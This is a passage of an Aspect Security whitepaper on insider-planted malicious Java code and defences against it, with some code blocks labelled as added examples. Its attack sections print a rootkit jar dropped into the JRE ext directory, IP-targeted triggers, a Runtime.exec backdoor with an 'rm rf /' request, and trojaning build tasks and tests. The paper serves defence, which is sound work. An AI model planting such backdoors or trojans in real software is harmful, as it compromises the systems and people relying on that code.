%>
</body>
</html>

One simple technique is to write a new jar file to the "ext" directory in the Java runtime environment. This technique is, incidentally, used by Apple to shove the QTJava.zip file onto everyone's classpath. Jar files added to this directory are automatically added to the classpath of all programs executed by that virtual machine. Even if you enable the SecurityManager, don't forget that standard extensions get AllPermission by default in the jre/lib/security/java.policy file.
grant codeBase "file:${{java.ext.dirs}}/*" {
permission java.security.AllPermission;
};

This technique can help an attacker to get a permanent rootkit onto the classpath in a way that is very difficult to detect. All the malicious looking code can be isolated in the jar file, which is very unlikely for anyone to ever notice or examine. The code to invoke the rootkit can look quite innocuous.
// Step 0: Create a rootkit class and get the bytecode as a string
public class Kitty {
    static {
        try {
            Runtime.getRuntime().exec("notepad");
        } catch (Exception e) {}
    }
}

// Step 1: Put innocent looking writeJar() in some utility class somewhere
public static void writeJar( byte[] b, String cn, String jp ) throws Exception {
    CRC32 crc32 = new CRC32();
    crc32.update(b, 0, b.length);
    String shortName = cn.substring(0, cn.indexOf(".class"));
    Manifest mf = new Manifest();
    mf.getMainAttributes().putValue("Manifest-Version", "1.0");
    mf.getMainAttributes().putValue("Main-Class", shortName);
    JarOutputStream jarout = new JarOutputStream(new FileOutputStream(jp), mf);
    JarEntry jarEntry = new JarEntry(cn);
    jarEntry.setSize(b.length);
    jarEntry.setTime(System.currentTimeMillis());
    jarEntry.setCrc(crc32.getValue());
    jarout.putNextEntry(jarEntry);
    jarout.write(b, 0, b.length);
    jarout.closeEntry();
    jarout.flush();
    jarout.finish();
}

// Step 2: Use innocent looking writeJar() to stash code in jre/lib/ext directory
public void doGet(HttpServletRequest req, HttpServletResponse resp) {
    byte[] b = new sun.misc.BASE64Decoder().decodeBuffer(req.getParameter("x"));
    writeJar( b, "Exec.class", "C:/AspectClass/Standard/jdk15/jre/lib/ext/Kitty.jar");
}

// Step 3: invoke the rootkit (no source for Kitty anywhere)
new Kitty();
Targeting Particular Enterprises
Remembering our assumption of no SecurityManager, there are essentially no limits to what the attack buried in the library can do. All of the attack techniques discussed above for insiders will work. To help minimize the likelihood of the attack being detected, attackers may target individual organizations with code that only runs on their network. In fact, the malicious code may be configured to only run in production and not in development.
The example below demonstrates limiting the attack to certain IP address ranges.
if ( InetAddress.getLocalHost().getHostAddress().startsWith( "64.14.153." ) ) {
// attack
}

Or, to restrict the attack to intranet applications, the attacker might restrict the attack to applications that are running on RFC 1918 addresses.
if ( InetAddress.getLocalHost().getAddress()[0] == 10 ) {
// attack
// TODO: also check for 192.168.*
}
6. Trojaning the Enterprise Build Server
In a great paper entitled "Reflections on Trusting Trust" [13], Ken Thompson shows just how easy it is to abuse the chain of tools that produce software. He tells how he backdoored the Unix login program, then hid the attack in the compiler, and then hid the compiler attack in itself. His attack was not present in the source code, only in the binaries produced by his trojaned tool chain.
Modern software build environments are tremendously complex. In the old days, the only tools anyone needed were a compiler and perhaps a linker [14]. Today, there are entire build systems that provide automatic retrieval from source code management systems, automated builds, dependency resolution, plugin execution, static analysis, test suite execution, code coverage analysis, continuous integration, metrics dashboards, and more. A common tool-chain is built using open source tools such as Subversion, Maven, Hudson, Nexus, and Sonar [15].
The software used in this common tool chain is comprised of a large number of modules, components, tools, frameworks, and other types of open source software projects. These open source projects are included into the tool chain as jar files that are loaded and executed. There are over 100 unique open source projects included in the tool chain and probably thousands of developers. Estimated counts for the various tools are below, although there are significant overlaps between the tools.
Hudson core: 105 open source projects
Hudson dependencies: ~50 open source projects
Maven core: ~15 open source projects
Nexus core: 86 open source projects
Subversion: ~5 open source projects
Sonar: ~100 open source projects
A rough count of the code involved in the 505 JAR files needed to run Maven, Hudson, and Nexus revealed over 16 million lines of code driving this tool chain. Exact duplicates were removed from the count, but these numbers still include several versions of many JAR files.
There is a risk that malicious code in this tool chain could modify production code and undermine the security of the production environment. In the worst case, an attacker would become a committer on one of the open source projects that feeds this tool chain. They would insert code into the project that, when run, would modify the software being built. Any flaw in the tool chain could result in a complete compromise of operational security, and it would be very difficult to detect.
There are already serious security vulnerabilities in this tool chain. A cursory review of the Hudson web application revealed numerous XSS and CSRF issues that have been reported to the project. The most serious of these involves a forged request to an administrative functionality that allows arbitrary Java code, including calls to Runtime.exec(), to be sent to the server where it is executed on behalf of the administrator. Although they appear to be inadvertent, there is no way to know whether these holes are intentional or not.
A malicious attacker could modify the bytecode for the software in a way that would allow remote access. For example, the attacker could insert a new method to override doOptions() or doTrace() in any class extending HttpServlet. Or the attacker could insert an extra line of code into an existing method, such as doGet() or doPost(). Once the tool-chain is subverted, there are countless possibilities for a malicious attacker and they are not complex.
public void doOptions(HttpServletRequest req, HttpServletResponse resp) {
...
Runtime.getRuntime().exec( req.getParameter( "attack" ) );
...
}

OPTIONS http://www.example.com/servlet?attack="rm rf /" HTTP/1.0

An outsider could easily target the open source tools used in the tool chain within many organizations. Eclipse is widely used and has hundreds of open source plugins that are also widely used. In many organizations, Eclipse drives the build process and has the opportunity to subvert anything built. The attacker would simply have to choose a popular plugin project where becoming a committer is the easiest.
Abusing Build Tasks
Most internal developers would not have direct access to the tool chain. Therefore, they would have to figure out a way to use the powerful tools there to subvert the production code. Developers can do this by adding steps to the build script for their project. In an Ant build.xml file, developers can write extremely powerful tasks and get them to execute on the build server. They can delete files, overwrite files with updated versions, execute arbitrary code, and more.
In the example below, the attacker has created a simple task that executes a Java program. In this case, the program is the one discussed above that inserts instructions into the bytecode of Java classes. The
developer has placed a jar file in their home directory on the server, and sets the classpath to include that directory in this task. The program is set to trojan the deleteAccount.toString() method when it runs.
<java
classname="Bcel"
dir="${build.dir}"
fork="true"
failonerror="true"
maxmemory="128m">
<arg value="bin/deleteAccount.class toString"/>
<classpath>
<pathelement location="/usr/home/bobama/bcel.jar"/>
<pathelement path="${java.class.path}"/>
</classpath>
</java>

This is just a single example in a particular build system. All the various build script languages and environments support this type of attack, which means that these systems should receive much better scrutiny than they do now.
Abusing Test Cases
Any opportunity for a developer to run code on the build server is an opportunity for them to undermine the build. Probably the easiest way for a malicious developer to subvert the build system is to create a malicious test case that runs during each build. Test cases are simply Java code and there are no limits on what a malicious test case can access. Test code is generally completely unreviewed, as it is not usually considered security critical.
In most build systems, test code can do anything it wants to the build server. The test cases are run right after the code is compiled and built into jar or war files. The malicious test case could open these files and modify class files as discussed above. In addition, the malicious test case could modify any integrity checks, such as MD5 signatures, to match the trojaned software.
In fact, the malicious code could modify the build chain itself, such that all future builds would be compromised. To cover their tracks, the developer could delete the test code after it had had a chance to run. With continuous integration, this could occur within a matter of minutes after the malicious test case is committed into the configuration management system.
In the example below, the entire file system is searched for any files ending in ".class". If they are found, the toString() method is trojaned with a call to Runtime.exec() as demonstrated earlier.
import java.io.File;
import junit.framework.TestCase;

public class JUnit extends TestCase {

@org.junit.Test
public void testTrojanJava() {
trojan( new File( "/" ) );
}

public static void trojan(File file) {
if (file.isDirectory() ) {
for (File f : file.listFiles()) {
trojan(f);
}
} else {
if ( file.getName().endsWith( ".class" ) ) {
Bcel.trojan(file.getPath(), "toString");
}
}
}
}

Building on the examples discussed previously for Java, the build server is easy to trojan permanently. This installs a malicious jar into the ext directory, but it could also replace the jar files of the build server.
@org.junit.Test
public void testTrojanHudson() throws Exception {
String testData = "yv66vgAAADIAIAcAAgEAB...";
byte[] b = new sun.misc.BASE64Decoder().decodeBuffer(testData);
writeJar( b,"Exec.class","C:/AspectClass/Standard/jdk15/jre/lib/ext/Kitty.jar");
}
Abusing Dependency Resolution
A recent development in the world of software builds is the use of automatic dependency resolution. Essentially, modern build scripts fetch the libraries they need during the build process. What's more, any dependencies for those libraries are also downloaded. The image below shows a tiny piece of the dependencies in the public Maven repositories.
[Image not reproduced: a fragment of the dependency graph of the public Maven repositories]
While this process is extremely useful, it also opens the door for abuse. The question of who controls the repository is critical to the security of the production software. An attacker might attempt to add a malicious dependency to a piece of software to force it to be added to the production baseline. This works even if there is no actual software dependency on the malicious library.
7. Keeping Malicious Java Out of Your Portfolio
Malicious code is easy for insiders to insert, difficult to detect, and very damaging. Any reasonable evaluation of the risk has to rank this as fairly critical. But addressing the problem seems inconsistent with our current software development practices. So what can we do to minimize this risk?
General Strategies for Protecting Against Insiders
Of course, this problem is much, much older than computers. And the solutions haven't changed much throughout history, either. Bruce Schneier [16] has identified five basic techniques to minimize the risk associated with malicious insiders:
1. Limit the number of trusted people.
2. Ensure that trusted people are also trustworthy.
3. Limit the amount of trust each person has.
4. Give people overlapping spheres of trust.
5. Detect breaches of trust after the fact and prosecute the guilty.
These are reasonable principles, and we need to interpret them for the software development world. In essence, we need to do a threat model on the business of producing software and then design security controls that will detect, deter, or eliminate the risks inherent in the process.
Limiting the Number of Trusted Developers
Remember that every developer that has ever worked on code that you trust within your enterprise is an insider.
Consider the number of developers that contribute to the Hudson project described above. Across the hundreds of open source projects there could be thousands. As the number of people increases, so does the likelihood of having one who is malicious.
Keeping the number of developers under control seems like a good idea. Years of code reviews have demonstrated that the type and frequency of security vulnerabilities are fairly constant across sectors, languages, processes, and countries. So nobody should conclude that this is an indictment of outsourcing [2,3]. On one hand, a weak connection between software developer and buyer would seem to make malicious code more likely. However, a disgruntled insider may have more motive to attack.
Ensuring that Developers Are Trustworthy
- Background checks
- Bonding?
- Gradually earn the right to work on critical code, managed with security policy
- Establish accountability and make sure everyone knows you're watching
Limiting Trust in Your Coding Process
The time has come to show some restraint in what software we trust. Most enterprise platforms, frameworks, and applications include a fairly ridiculous amount of libraries. We are trusting our enterprises to all of this code. Before adding a new library to an application, we should consider the risk of adding that much more code that we have to trust.
We should also be stricter in defining the APIs that people are allowed to use. Enterprises should take a lesson from the Google AppEngine, a cloud computing environment. In the cloud, malicious code could potentially access other applications and the data from other enterprises. So rather than offer the entire Java and Java EE API, they provide a limited API that they call the "JRE Class Whitelist." [17] This is exactly the right approach, as it takes a positive approach to the problem. Although their whitelist still includes some dangerous APIs, such as reflection and classloading, it would not be a bad idea to use as a starting point in most enterprises.
Limiting Trust in Your Build Process
If an attacker can get malicious code into your build process, they can own all of your production software. The first step is to establish a tool-chain that you're willing to trust your enterprise to. Keep the size and pedigree of the software in mind when you select tools.
If the attraction of fancy build processes with continuous integration, metrics, tests, and other plugins is too great, consider setting up a second "trusted" build process with an absolute minimum number of tools, perhaps just javac and jar. By comparing the output of the fancy process with the trusted process, you may be able to detect attempts to trojan class files.
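One way to carry out that comparison, added here as an example and not code from the paper or from Aspect Security: hash every class entry in the jar produced by the full pipeline and in the jar produced by a javac-and-jar-only build, and report any class whose bytes differ or that exists in only one of the two. The two jar paths are placeholders passed on the command line.

```java
import java.io.InputStream;
import java.security.MessageDigest;
import java.util.Enumeration;
import java.util.Map;
import java.util.TreeMap;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

/*
 * Added example (not from the paper). Compares the jar produced by the full build
 * pipeline against the jar produced by a minimal javac-and-jar build by hashing
 * every class entry with SHA-256. Differences are exactly what a build-time
 * injection looks like; the two jar paths are placeholders given on the command line.
 */
public class BuildDiff {

    /** Entry name to hex SHA-256 of the entry bytes, for every .class entry in the jar. */
    public static Map<String, String> classDigests(String jarPath) throws Exception {
        Map<String, String> digests = new TreeMap<>();
        try (JarFile jar = new JarFile(jarPath, false)) {   // signatures are not the question here
            Enumeration<JarEntry> entries = jar.entries();
            while (entries.hasMoreElements()) {
                JarEntry e = entries.nextElement();
                if (e.isDirectory() || !e.getName().endsWith(".class")) continue;
                MessageDigest md = MessageDigest.getInstance("SHA-256");
                try (InputStream in = jar.getInputStream(e)) {
                    byte[] buf = new byte[8192];
                    int n;
                    while ((n = in.read(buf)) != -1) md.update(buf, 0, n);
                }
                digests.put(e.getName(), toHex(md.digest()));
            }
        }
        return digests;
    }

    /** Classes that differ between the trusted and the full build, with the reason. */
    public static Map<String, String> diff(Map<String, String> trusted, Map<String, String> full) {
        Map<String, String> report = new TreeMap<>();
        for (Map.Entry<String, String> t : trusted.entrySet()) {
            String other = full.get(t.getKey());
            if (other == null) {
                report.put(t.getKey(), "missing from full build");
            } else if (!other.equals(t.getValue())) {
                report.put(t.getKey(), "bytecode differs");
            }
        }
        for (String name : full.keySet()) {
            // A class the trusted build never produced is the classic injected payload.
            if (!trusted.containsKey(name)) report.put(name, "only in full build");
        }
        return report;
    }

    private static String toHex(byte[] bytes) {
        StringBuilder sb = new StringBuilder();
        for (byte b : bytes) sb.append(String.format("%02x", b));
        return sb.toString();
    }

    public static void main(String[] args) throws Exception {
        // usage: java BuildDiff trusted-build.jar full-build.jar
        Map<String, String> report = diff(classDigests(args[0]), classDigests(args[1]));
        if (report.isEmpty()) {
            System.out.println("OK: both builds contain identical class files");
            return;
        }
        for (Map.Entry<String, String> r : report.entrySet()) {
            System.out.println(r.getValue() + ": " + r.getKey());
        }
        System.exit(1);   // fail the pipeline on any discrepancy
    }
}
```

Both builds must use the same javac release and flags, since different compilers legitimately emit different bytecode; with that held constant, a class reported as "bytecode differs" or "only in full build" should stop the release until someone can explain it. Hashing class bytes rather than the whole jar keeps manifest, ordering and timestamp differences from hiding the real signal.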
For libraries that you can obtain source code for, don't use the jar file distributed by the project. If a malicious developer on the project has trojaned the jar file, even checking the MD5 hash won't provide any protection. Instead, consider grabbing the source and building the jar yourself with your own tools. Set up your own repository to keep good copies of libraries you are relying on. Don't simply trust your business to what you get from a public repository.
Once you've built jar files that you can trust, use the "sealing" and "signing" features available in Java to protect them from modification and misuse. Sealing jar files is a simple change to the manifest and it means that all classes defined in that package must be archived in the same JAR file. This prevents developers from adding classes in the same package to the classpath that override or extend your code. Signing jar files allows you to grant privileges based on the signer of the codebase. For example, you can grant the permission to make database connections only to code that is signed by you.
Limiting Trust in Your Operational Process
The Java SecurityManager, commonly known as the "sandbox", was designed to allow people to run Java applet code in their browser that they did not write. Compare this with what enterprises are doing on the server side: running untrusted code in a sensitive environment. The problem is exactly the same and the sandbox solution is the best answer we have. The sandbox is incredibly useful when you are running Java code in a web container that you did not write.
Today's SecurityManager requires permissions to access many of the Java calls that can be used to implement malicious code. The sandbox can make it significantly more difficult for attackers to use many of the techniques described in this paper. In fact, enabling the sandbox on your build server will help to prevent attacks there as well.
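A policy fragment in the syntax of jre/lib/security/java.policy, added here as an example and not taken from the paper or from any container's documentation, that narrows the default extension-directory grant quoted earlier and gives application code only the permissions it needs. The code base path, log directory, database host and port are placeholders.

```text
// Added example, in the syntax of jre/lib/security/java.policy; not taken from
// the paper or from any vendor's documentation. Paths, host and port are placeholders.

// Default entry shipped in java.policy (the weak setting): every jar dropped into
// the extension directories runs with AllPermission.
//   grant codeBase "file:${{java.ext.dirs}}/*" {
//       permission java.security.AllPermission;
//   };

// Replacement: extension jars may read the runtime and system properties, nothing more.
grant codeBase "file:${{java.ext.dirs}}/*" {
    permission java.io.FilePermission "${java.home}${/}-", "read";
    permission java.util.PropertyPermission "*", "read";
};

// Application code gets only what it demonstrably needs. There is no "execute"
// FilePermission, so Runtime.exec() fails, and no "write" permission under
// ${java.home}, so the jce.jar and ext-directory writes shown above fail too.
grant codeBase "file:/opt/webapps/app/-" {
    permission java.io.FilePermission "/opt/webapps/app/-", "read";
    permission java.io.FilePermission "/var/log/app/-", "read,write";
    permission java.net.SocketPermission "db.internal.example:5432", "connect,resolve";
    permission java.util.PropertyPermission "*", "read";
    permission java.lang.RuntimePermission "getClassLoader";
};
```

The container still has to be started with the SecurityManager enabled (for Tomcat, the -security option described in reference [6]) and pointed at this file with -Djava.security.policy==file (two equals signs), so that the JRE's own java.policy, with its AllPermission grant for the extension directories, is not loaded in addition. Expect an application written without the sandbox in mind to throw AccessControlException in places; each one is a permission to either grant deliberately or design away.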
All of the major servlet containers, including WebSphere, WebLogic, Tomcat, and Glassfish, support the use of a SecurityManager. Unfortunately, it is disabled by default in all of them [5,6,7,8]. Their product documentation does not encourage the use of the sandbox. In fairness, enabling the sandbox on most applications is difficult because they were not written with limited permissions in mind.
Remember, the sandbox doesn't protect against everything. It can only protect against certain uses of libraries and various dangerous calls. There are lots of attacks that an enterprise developer could perform that do not make a request of the SecurityManager.
Beyond the sandbox, you should check the classpath for your application and print out all the jars and directories listed there. All the jars and classes there should be required for your application, and should be sealed and signed as mentioned above.
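A classpath audit that does what the paragraph above asks, added here as an example and not code from the paper: it lists every entry of java.class.path, reports whether each jar's manifest seals its packages and whether every class in it carries a verified signature, and then does the same for the jars in java.ext.dirs, which the runtime loads without ever listing them on java.class.path (the extension-directory technique earlier in the paper relies on exactly that).

```java
import java.io.File;
import java.io.InputStream;
import java.security.CodeSigner;
import java.util.ArrayList;
import java.util.Enumeration;
import java.util.List;
import java.util.jar.Attributes;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import java.util.jar.Manifest;

/*
 * Added example (not from the paper). Lists every entry on java.class.path and
 * reports whether each jar is sealed and whether all of its classes carry a
 * verified signature. Extension jars are audited separately because the
 * runtime loads them without ever listing them on java.class.path.
 */
public class ClasspathAudit {

    /** One finding per classpath entry. */
    public static List<String> audit(String classPath) {
        List<String> findings = new ArrayList<>();
        for (String entry : classPath.split(File.pathSeparator)) {
            if (entry.isEmpty()) continue;
            File f = new File(entry);
            if (f.isDirectory()) {
                // Loose class files carry no manifest and no signature at all.
                findings.add("DIRECTORY (cannot be sealed or signed): " + entry);
            } else if (entry.endsWith(".jar")) {
                findings.add(describeJar(f));
            } else {
                findings.add("UNKNOWN entry type: " + entry);
            }
        }
        return findings;
    }

    /** Jars in the extension directories named by java.ext.dirs (null on JVMs without it). */
    public static List<String> extensionJars(String extDirs) {
        List<String> jars = new ArrayList<>();
        if (extDirs == null) return jars;
        for (String dir : extDirs.split(File.pathSeparator)) {
            File[] files = new File(dir).listFiles();
            if (files == null) continue;
            for (File f : files) {
                if (f.getName().endsWith(".jar")) jars.add(f.getPath());
            }
        }
        return jars;
    }

    /** Reads the manifest, then streams every class so the JarFile verifies its signature. */
    public static String describeJar(File jarFile) {
        try (JarFile jar = new JarFile(jarFile, true)) {   // true: verify signatures
            Manifest mf = jar.getManifest();
            boolean sealed = false;
            if (mf != null) {
                // Sealing may be declared for the whole jar or per package section.
                sealed = "true".equalsIgnoreCase(mf.getMainAttributes().getValue(Attributes.Name.SEALED));
                for (Attributes a : mf.getEntries().values()) {
                    if ("true".equalsIgnoreCase(a.getValue(Attributes.Name.SEALED))) sealed = true;
                }
            }
            int classes = 0, signedClasses = 0;
            Enumeration<JarEntry> entries = jar.entries();
            while (entries.hasMoreElements()) {
                JarEntry e = entries.nextElement();
                if (e.isDirectory() || !e.getName().endsWith(".class")) continue;
                classes++;
                // getCodeSigners() is only populated once the entry has been read to the end.
                try (InputStream in = jar.getInputStream(e)) {
                    byte[] buf = new byte[8192];
                    while (in.read(buf) != -1) { /* reading drives verification */ }
                }
                CodeSigner[] signers = e.getCodeSigners();
                if (signers != null && signers.length > 0) signedClasses++;
            }
            String signing = classes == 0 ? "no classes"
                    : signedClasses == classes ? "all classes signed"
                    : signedClasses == 0 ? "UNSIGNED" : "PARTIALLY signed";
            return (sealed ? "sealed, " : "NOT sealed, ") + signing + ": " + jarFile;
        } catch (Exception ex) {
            // A SecurityException while reading means a digest or signature did not verify.
            return "FAILED verification (" + ex + "): " + jarFile;
        }
    }

    public static void main(String[] args) {
        for (String line : audit(System.getProperty("java.class.path"))) {
            System.out.println(line);
        }
        for (String jar : extensionJars(System.getProperty("java.ext.dirs"))) {
            System.out.println("EXT " + describeJar(new File(jar)));
        }
    }
}
```

Run it inside the container with the same JVM and classpath as the application. A jar whose signature no longer verifies raises a SecurityException while its entries are read, which the audit reports as FAILED verification; that is the tampering case sealing and signing exist to catch. "All classes signed" only says a signature verified, not who signed; pair it with a policy that grants privileges by signer, as the sealing and signing paragraph describes.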
One last tip for limiting the trust in the operational environment. Don't run with a full JDK including the compiler. As we saw above, the compiler API is quite powerful, and gives developers the freedom to write code at runtime. A better approach is to run with only a JRE in production. The downside is that you'll have to use jspc to precompile your JSPs.
Establishing Overlapping Spheres of Trust
Schneier notes that movie theaters have one person selling tickets and another only a few yards away ripping them in half. The reason for this is that it's more difficult for one person to defraud the theater. This is the type of thinking that we should apply to securing the software development process.
The use of "peer code review" is a long standing practice in many strong software development organizations. While these meetings tend to focus on non-security related concerns, they also make it considerably less likely for an attacker to attempt to sneak in malicious code. Training the peer reviewers to look for malicious code may also help.
The Agile practice of "pair programming" is also likely to be a deterrent to malicious code. Having two developers intimately familiar with the same code makes malicious code easier to detect. Agile's test-driven development may also help if security tests are included in the test suite.
For critical projects, it might even be possible to structure the software in a way that any truly devastating attack would require access to more than one part. This is somewhat similar to the government's compartmented projects. By restricting developers to only one part of the software, malicious code attacks are more difficult.
Detecting Malicious Code
Because programmers make a lot of inadvertent mistakes, we never really know if a vulnerability is malicious or just an accident. Even following the suggestions above, it is quite likely that numerous vulnerabilities will end up in our software. This makes detection of vulnerabilities and breaches critically important, as it is the last line of defense against potentially devastating attacks.
We should start by establishing strong accountability for all the code we use. For internally developed code, this involves source code control systems that authenticate and keep a record of all changes. For
libraries and tools, we should get an official build, create integrity checks, perform security testing, and monitor the integrity seals.
We should also carefully validate the security of our own code. A program to identify malicious code looks similar to ordinary application security programs. But the process should be enhanced to seek Java enterprise rootkits as well as simple vulnerabilities. This is an area that needs additional research.
One area of research is to ensure that Java code is checked for tricky escaping as discussed above. Applying a code formatter may help to make manual code review more effective. We also need to research better static analysis rules that assist human reviewers by flagging possible malicious code. The examples covered in this paper barely scratch the surface of the ways to misuse the powerful APIs available in the typical enterprise Java environment.
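A starting point for the escape check mentioned above, added here as an example and not code from the paper: javac replaces Unicode escapes before it tokenizes, so an escape that decodes to an ASCII character (one that could simply have been typed, or a line terminator that ends a // comment early) has no honest reason to be in source and is worth a reviewer's attention. The sample source text and the hiddenCall() name in it are constructed for the demonstration.

```java
import java.util.ArrayList;
import java.util.List;

/*
 * Added example (not from the paper). javac translates Unicode escapes
 * (a backslash, one or more 'u', four hex digits) before lexing, so an escape
 * can hide code inside what reads as a comment or string. An escape that
 * decodes to ASCII has no honest reason to exist: a printable character could
 * have been typed, and a line terminator silently ends a line comment.
 * Per JLS 3.3 a backslash starts an escape only when preceded by an even
 * number of backslashes.
 */
public class EscapeCheck {

    /** One finding: the source line, the literal escape text, and its decoded code point. */
    public static final class Finding {
        public final int line;
        public final String escape;
        public final int codePoint;
        Finding(int line, String escape, int codePoint) {
            this.line = line; this.escape = escape; this.codePoint = codePoint;
        }
        @Override public String toString() {
            return String.format("line %d: %s decodes to U+%04X", line, escape, codePoint);
        }
    }

    /** Scans raw Java source text and returns every escape that decodes to ASCII. */
    public static List<Finding> findSuspiciousEscapes(String source) {
        List<Finding> findings = new ArrayList<>();
        int line = 1;
        int backslashes = 0;   // length of the current run of consecutive backslashes
        for (int i = 0; i < source.length(); i++) {
            char c = source.charAt(i);
            if (c == '\n') { line++; backslashes = 0; continue; }
            if (c == '\\') { backslashes++; continue; }
            if (c == 'u' && backslashes % 2 == 1) {
                int j = i;
                while (j < source.length() && source.charAt(j) == 'u') j++;  // any number of 'u' is legal
                if (j + 4 <= source.length() && isHex(source, j, j + 4)) {
                    int cp = Integer.parseInt(source.substring(j, j + 4), 16);
                    if (cp < 0x80) {   // ASCII, including the LF and CR that end a line comment
                        findings.add(new Finding(line, "\\" + source.substring(i, j + 4), cp));
                    }
                    i = j + 3;     // the for loop's i++ then steps past the last hex digit
                }
            }
            backslashes = 0;
        }
        return findings;
    }

    private static boolean isHex(String s, int from, int to) {
        for (int k = from; k < to; k++) {
            if (Character.digit(s.charAt(k), 16) < 0) return false;
        }
        return true;
    }

    public static void main(String[] args) {
        // Constructed sample. On line 3 javac turns the escape into a line feed, so the
        // comment ends there and hiddenCall() is compiled as a statement of run().
        String sample =
            "public class Innocent {\n" +
            "    void run() {\n" +
            "        // harmless note \\u000a hiddenCall();\n" +
            "        String s = \"copyright \\u00a9 2009\";   // non-ASCII: legitimate\n" +
            "        String t = \"\\\\u0041\";                // escaped backslash, not an escape\n" +
            "    }\n" +
            "}\n";
        for (Finding f : findSuspiciousEscapes(sample)) {
            System.out.println(f);   // reports only the line 3 escape, decoding to U+000A
        }
    }
}
```

Escapes for non-ASCII characters (line 4 of the sample) are the legitimate use and pass; an escaped backslash (line 5) is correctly not treated as an escape. Running a formatter first, as the paragraph suggests, does not remove this class of trick, since formatters preserve comment and string contents, so the check belongs alongside it rather than instead of it.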
About Aspect Security
Aspect Security is the leading provider of application security assurance services and training. Millions of lines of critical application code are verified each month by Aspect's experienced penetration testing and code review specialists. Aspect teaches advanced hands-on security courses to thousands of architects, developers, and managers each year. Many organizations with critical applications have regained application security control by implementing Aspect's Catalyst program. Aspect is headquartered in Columbia MD. For information, visit www.aspectsecurity.com or call 301-604-4882.
About the Author
Jeff Williams is the CEO and a founder of Aspect Security, specializing exclusively in application security professional services. Jeff also serves as the volunteer Chair of the Open Web Application Security Project (OWASP). Jeff has made extensive contributions to the application security community through OWASP, including writing the Top Ten, WebGoat, Secure Software Contract Annex, Enterprise Security API, OWASP Risk Rating Methodology, the XSS Prevention Cheat Sheet, and starting the worldwide local chapters program. Jeff has been writing code for 25 years from mainframe to cloud and has now dedicated his life to getting the software market to make rational decisions about security risks. Jeff has degrees in computer science and psychology, and wasted a ton of time and money on a law degree from Georgetown.
References
[1] - Ed Yourdon, "Byte Wars, the Impact of September 11 on IT," Yourdon Press, Prentice Hall, 2002
http://www.yourdon.com/?loc=aboutme
[2] - James A. Lewis, "Foreign Influence on Software: Risks and Recourse," March 2007.
http://www.csis.org/publication/foreign-influence-software
[3] - McHenry, William K. and Carmel, Erran (2008) "Potential Threats of Offshoring Software R&D," Journal of Homeland Security and Emergency Management: Vol. 5: Issue 1, Article 6.
http://www.bepress.com/jhsem/vol5/iss1/6
[4] - OWASP Enterprise Security API, 2009
http://www.owasp.org/index.php/ESAPI
[5] - WebSphere 7.0 Product Documentation, "Although Java 2 security is supported, it is disabled by default"
http://publib.boulder.ibm.com/infocenter/wasinfo/v7r0/index.jsp?topic=/com.ibm.websphere.nd.doc/info/welcome_nd.html
[6] - Tomcat 6.0 Documentation, "Tomcat can be started with a SecurityManager in place by using the "-security" option"
http://tomcat.apache.org/tomcat-6.0-doc/security-manager-howto.html
[7] - Glassfish Prelude 3 Documentation, "The security manager is disabled by default"
http://docs.sun.com/app/docs/doc/820-4496/abvah?a=view
[8] - WebLogic 10 Product Documentation, "Using a Java Security Manager is an optional security step"
http://e-docs.bea.com/wls/docs100/security/server_prot.html
[9] - Arthur Conan Doyle, "Silver Blaze," "the curious incident of the dog in the night-time", 1892
http://en.wikipedia.org/wiki/Silver_Blaze
[10] - Dr. Heinz M. Kabutz, "Java 5 - 'final' is not final anymore", October 2004
http://www.javaspecialists.co.za/archive/Issue096.html
[11] - Allan Holub, "Modifying archives, Part 2: The Archive Class," October 2000
http://www.javaworld.com/javaworld/jw-10-2000/jw-1027-toolbox.html
[12] - Fowler, "Inversion of Control Containers and the Dependency Injection Pattern," January 2004
http://www.martinfowler.com/articles/injection.html
[13] - Ken Thompson, "Reflections on Trusting Trust," August 1984
http://cm.bell-labs.com/who/ken/trust.html
[14] - David Maynor, "The Compiler as Attack Vector," January 2005
http://www.linuxjournal.com/article/7839
[15] - Chess, Lee, and West, "Attacking the Build through Cross-Build Injection," September 2007
http://www.fortify.com/servlet/download/public/fortify_attacking_the_build.pdf
[16] - Bruce Schneier, "Insiders", February 2009
http://www.schneier.com/blog/archives/2009/02/insiders.html
[17] - Google AppEngine Documentation, "The JRE Class Whitelist"
http://code.google.com/appengine/docs/java/jrewhitelist.html
